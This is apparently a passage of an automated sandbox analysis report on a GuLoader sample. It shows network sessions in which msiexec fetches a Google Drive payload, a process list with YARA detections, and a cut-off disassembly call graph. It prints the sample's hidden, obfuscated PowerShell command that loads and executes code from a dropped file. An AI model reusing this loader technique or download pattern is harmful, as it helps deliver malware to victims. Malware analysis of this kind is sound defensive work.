                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:48 GMT
                                                                  Content-Security-Policy: script-src 'nonce-jSaWvV7c7zdYp-GA7lDKIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 36 34 6c 34 36 54 72 51 71 51 34 31 32 47 4e 36 2d 6c 6b 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-64l46TrQqQ412GN6-lkqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  76192.168.2.550052142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:48 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:49 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:49 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-iWeYc7CqWHA2tT159YQv_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  77192.168.2.550053142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:50 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:50 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC6IAnZyOYX3yGygp7Mb62dE4Zmi_uFCKqyNswAJrJx5G3C5t7ciKYak5_njuTU8yxRieA2Ss_U
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:50 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-VI5emukswZgdWeNReso7bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 68 36 79 62 31 4c 56 5a 6e 65 62 56 57 71 6f 4a 67 58 33 73 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jh6yb1LVZnebVWqoJgX3sQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  78192.168.2.550054142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:51 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:51 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:51 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-8gkJIbp3fmqP-C52CxJjdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  79192.168.2.550055142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:52 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:52 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4IDEZ9M-RkPG74nJqg_MmxdlUZtPk59lrzJ_O6bCbrmOQxTdZt7iEANFj-JQG5tCPZfL1RleM
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:52 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: script-src 'nonce-yi4zFc4YBfras0kJrdZqAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 39 68 78 6c 5f 4d 5a 62 48 71 4c 78 70 37 52 4a 4d 6e 56 47 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_9hxl_MZbHqLxp7RJMnVGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:09:15:46
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Xjz8dblHDe.exe"
                                                                  Imagebase:0x400000
                                                                  File size:685'600 bytes
                                                                  MD5 hash:CDDE73A8F16B1279010F660E5AB67903
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:09:15:47
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)"
                                                                  Imagebase:0x740000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2319447500.0000000009764000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:09:15:47
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:09:16:11
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                                  Imagebase:0x490000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.3316134163.00000000037E4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:24.3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.4%
                                                                    Total number of Nodes:1340
                                                                    Total number of Limit Nodes:35
                                                                    execution_graph 3022 401941 3023 401943 3022->3023 3028 402c41 3023->3028 3029 402c4d 3028->3029 3074 4062b9 3029->3074 3032 401948 3034 4059a9 3032->3034 3116 405c74 3034->3116 3037 4059d1 DeleteFileW 3039 401951 3037->3039 3038 4059e8 3040 405b13 3038->3040 3130 406297 lstrcpynW 3038->3130 3040->3039 3159 4065da FindFirstFileW 3040->3159 3042 405a0e 3043 405a21 3042->3043 3044 405a14 lstrcatW 3042->3044 3131 405bb8 lstrlenW 3043->3131 3046 405a27 3044->3046 3049 405a37 lstrcatW 3046->3049 3050 405a2d 3046->3050 3051 405a42 lstrlenW FindFirstFileW 3049->3051 3050->3049 3050->3051 3053 405b08 3051->3053 3060 405a64 3051->3060 3052 405b31 3162 405b6c lstrlenW CharPrevW 3052->3162 3053->3040 3056 405aeb FindNextFileW 3056->3060 3061 405b01 FindClose 3056->3061 3057 405961 5 API calls 3059 405b43 3057->3059 3062 405b47 3059->3062 3063 405b5d 3059->3063 3060->3056 3067 4059a9 60 API calls 3060->3067 3069 4052ff 24 API calls 3060->3069 3135 406297 lstrcpynW 3060->3135 3136 405961 3060->3136 3144 4052ff 3060->3144 3155 40605d MoveFileExW 3060->3155 3061->3053 3062->3039 3066 4052ff 24 API calls 3062->3066 3065 4052ff 24 API calls 3063->3065 3065->3039 3068 405b54 3066->3068 3067->3060 3070 40605d 36 API calls 3068->3070 3069->3056 3072 405b5b 3070->3072 3072->3039 3075 4062c6 3074->3075 3076 406511 3075->3076 3079 4064df lstrlenW 3075->3079 3081 4062b9 10 API calls 3075->3081 3084 4063f4 GetSystemDirectoryW 3075->3084 3085 406407 GetWindowsDirectoryW 3075->3085 3086 40652b 5 API calls 3075->3086 3087 4062b9 10 API calls 3075->3087 3088 406482 lstrcatW 3075->3088 3089 40643b SHGetSpecialFolderLocation 3075->3089 3100 406165 3075->3100 3105 4061de wsprintfW 3075->3105 3106 406297 lstrcpynW 3075->3106 3077 402c6e 3076->3077 3107 406297 lstrcpynW 3076->3107 3077->3032 3091 40652b 3077->3091 3079->3075 3081->3079 3084->3075 3085->3075 3086->3075 3087->3075 3088->3075 3089->3075 3090 406453 SHGetPathFromIDListW CoTaskMemFree 3089->3090 3090->3075 3098 406538 3091->3098 3092 4065b3 CharPrevW 3095 4065ae 3092->3095 3093 4065a1 CharNextW 3093->3095 3093->3098 3095->3092 3096 4065d4 3095->3096 3096->3032 3097 40658d CharNextW 3097->3098 3098->3093 3098->3095 3098->3097 3099 40659c CharNextW 3098->3099 3112 405b99 3098->3112 3099->3093 3108 406104 3100->3108 3103 406199 RegQueryValueExW RegCloseKey 3104 4061c9 3103->3104 3104->3075 3105->3075 3106->3075 3107->3077 3109 406113 3108->3109 3110 40611c RegOpenKeyExW 3109->3110 3111 406117 3109->3111 3110->3111 3111->3103 3111->3104 3113 405b9f 3112->3113 3114 405bb5 3113->3114 3115 405ba6 CharNextW 3113->3115 3114->3098 3115->3113 3165 406297 lstrcpynW 3116->3165 3118 405c85 3166 405c17 CharNextW CharNextW 3118->3166 3121 4059c9 3121->3037 3121->3038 3122 40652b 5 API calls 3128 405c9b 3122->3128 3123 405ccc lstrlenW 3124 405cd7 3123->3124 3123->3128 3126 405b6c 3 API calls 3124->3126 3125 4065da 2 API calls 3125->3128 3127 405cdc GetFileAttributesW 3126->3127 3127->3121 3128->3121 3128->3123 3128->3125 3129 405bb8 2 API calls 3128->3129 3129->3123 3130->3042 3132 405bc6 3131->3132 3133 405bd8 3132->3133 3134 405bcc CharPrevW 3132->3134 3133->3046 3134->3132 3134->3133 3135->3060 3172 405d68 GetFileAttributesW 3136->3172 3139 40598e 3139->3060 3140 405984 DeleteFileW 3142 40598a 3140->3142 3141 40597c RemoveDirectoryW 3141->3142 3142->3139 3143 40599a SetFileAttributesW 3142->3143 3143->3139 3145 40531a 3144->3145 3154 4053bc 3144->3154 3146 405336 lstrlenW 3145->3146 3147 4062b9 17 API calls 3145->3147 3148 405344 lstrlenW 3146->3148 3149 40535f 3146->3149 3147->3146 3150 405356 lstrcatW 3148->3150 3148->3154 3151 405372 3149->3151 3152 405365 SetWindowTextW 3149->3152 3150->3149 3153 405378 SendMessageW SendMessageW SendMessageW 3151->3153 3151->3154 3152->3151 3153->3154 3154->3060 3156 40607e 3155->3156 3157 406071 3155->3157 3156->3060 3175 405ee3 3157->3175 3160 4065f0 FindClose 3159->3160 3161 405b2d 3159->3161 3160->3161 3161->3039 3161->3052 3163 405b37 3162->3163 3164 405b88 lstrcatW 3162->3164 3163->3057 3164->3163 3165->3118 3167 405c34 3166->3167 3168 405c46 3166->3168 3167->3168 3169 405c41 CharNextW 3167->3169 3170 405b99 CharNextW 3168->3170 3171 405c6a 3168->3171 3169->3171 3170->3168 3171->3121 3171->3122 3173 40596d 3172->3173 3174 405d7a SetFileAttributesW 3172->3174 3173->3139 3173->3140 3173->3141 3174->3173 3176 405f13 3175->3176 3177 405f39 GetShortPathNameW 3175->3177 3202 405d8d GetFileAttributesW CreateFileW 3176->3202 3179 406058 3177->3179 3180 405f4e 3177->3180 3179->3156 3180->3179 3182 405f56 wsprintfA 3180->3182 3181 405f1d CloseHandle GetShortPathNameW 3181->3179 3184 405f31 3181->3184 3183 4062b9 17 API calls 3182->3183 3185 405f7e 3183->3185 3184->3177 3184->3179 3203 405d8d GetFileAttributesW CreateFileW 3185->3203 3187 405f8b 3187->3179 3188 405f9a GetFileSize GlobalAlloc 3187->3188 3189 406051 CloseHandle 3188->3189 3190 405fbc 3188->3190 3189->3179 3204 405e10 ReadFile 3190->3204 3195 405fdb lstrcpyA 3198 405ffd 3195->3198 3196 405fef 3197 405cf2 4 API calls 3196->3197 3197->3198 3199 406034 SetFilePointer 3198->3199 3211 405e3f WriteFile 3199->3211 3202->3181 3203->3187 3205 405e2e 3204->3205 3205->3189 3206 405cf2 lstrlenA 3205->3206 3207 405d33 lstrlenA 3206->3207 3208 405d3b 3207->3208 3209 405d0c lstrcmpiA 3207->3209 3208->3195 3208->3196 3209->3208 3210 405d2a CharNextA 3209->3210 3210->3207 3212 405e5d GlobalFree 3211->3212 3212->3189 3213 4015c1 3214 402c41 17 API calls 3213->3214 3215 4015c8 3214->3215 3216 405c17 4 API calls 3215->3216 3226 4015d1 3216->3226 3217 401631 3219 401663 3217->3219 3220 401636 3217->3220 3218 405b99 CharNextW 3218->3226 3222 401423 24 API calls 3219->3222 3240 401423 3220->3240 3230 40165b 3222->3230 3226->3217 3226->3218 3229 401617 GetFileAttributesW 3226->3229 3232 405868 3226->3232 3235 4057ce CreateDirectoryW 3226->3235 3244 40584b CreateDirectoryW 3226->3244 3228 40164a SetCurrentDirectoryW 3228->3230 3229->3226 3247 406671 GetModuleHandleA 3232->3247 3236 40581b 3235->3236 3237 40581f GetLastError 3235->3237 3236->3226 3237->3236 3238 40582e SetFileSecurityW 3237->3238 3238->3236 3239 405844 GetLastError 3238->3239 3239->3236 3241 4052ff 24 API calls 3240->3241 3242 401431 3241->3242 3243 406297 lstrcpynW 3242->3243 3243->3228 3245 